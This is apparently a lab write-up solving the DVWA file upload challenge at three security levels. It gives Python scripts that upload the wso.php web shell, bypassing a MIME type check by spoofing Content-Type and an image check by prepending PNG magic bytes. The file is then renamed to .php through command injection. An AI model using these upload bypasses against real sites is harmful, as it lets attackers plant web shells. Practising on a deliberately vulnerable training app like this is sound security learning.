DVWA - File Upload (low, medium, high)

low

At this level there are no checks at all, so the shell is uploaded directly.

import re
import requests

def main():
    # Session cookie plus the DVWA security level; replace PHPSESSID with your own session
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=low'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    # Low level accepts anything, so the .php shell goes up with its real name and type
    with open('wso.php', 'rb') as f:
        files = [('uploaded', ('wso.php', f, 'application/octet-stream'))]
        res = requests.post(url, data=data, files=files, headers=headers)
    # DVWA wraps the upload status message in a <pre> element
    m = re.search(r'<pre>(.*?)</pre>', res.text, re.M | re.S)
    if m:
        print(m.group(1))

if __name__ == '__main__':
    main()

The result returned is:

../../hackable/uploads/wso.php succesfully uploaded!

medium

Looking at the source, the code restricts the MIME type and the file size:

if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) )

Bypass: $uploaded_type comes from the Content-Type field of the multipart form part, which the client sets, so changing the MIME type in the request is enough.

import re
import requests

def main():
    # Session cookie plus the DVWA security level; replace PHPSESSID with your own session
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=medium'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    # Same .php shell and filename as before; only the client-supplied Content-Type changes
    with open('wso.php', 'rb') as f:
        files = [('uploaded', ('wso.php', f, 'image/jpeg'))]
        res = requests.post(url, data=data, files=files, headers=headers)
    # DVWA wraps the upload status message in a <pre> element
    m = re.search(r'<pre>(.*?)</pre>', res.text, re.M | re.S)
    if m:
        print(m.group(1))

if __name__ == '__main__':
    main()

high

Looking at the source, the code restricts the file extension and the file size, and calls getimagesize on the uploaded file to check that it parses as an image:

// Is it an image? 
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) )

Bypass: rename the shell so its extension is jpg/jpeg/png, and insert a jpg/png/gif file header at the start of the file to get past getimagesize. getimagesize only examines the magic bytes at the start of the file (for PNG it then reads the width and height fields that follow without validating them), so a file that begins with the signature and continues with PHP source passes the check. Here I use the PNG header (first 8 bytes):

89 50 4E 47 0D 0A 1A 0A

Note: do this with a binary/hex editor.

import re
import requests

def main():
    # Session cookie plus the DVWA security level; replace PHPSESSID with your own session
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=high'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    # dog.php is the shell with the 8-byte PNG signature prepended; it is sent under a
    # .png filename to satisfy the extension check. High level ignores the Content-Type.
    with open('dog.php', 'rb') as f:
        files = [('uploaded', ('wso.png', f, 'application/octet-stream'))]
        res = requests.post(url, data=data, files=files, headers=headers)
    # DVWA wraps the upload status message in a <pre> element
    m = re.search(r'<pre>(.*?)</pre>', res.text, re.M | re.S)
    if m:
        print(m.group(1))

if __name__ == '__main__':
    main()

After the file is uploaded, use the command injection vulnerability from the earlier challenge and run mv to change its extension to .php. [This is something of a joke; I have the feeling there is a way that does not need command injection, and would appreciate pointers from anyone passing by.]
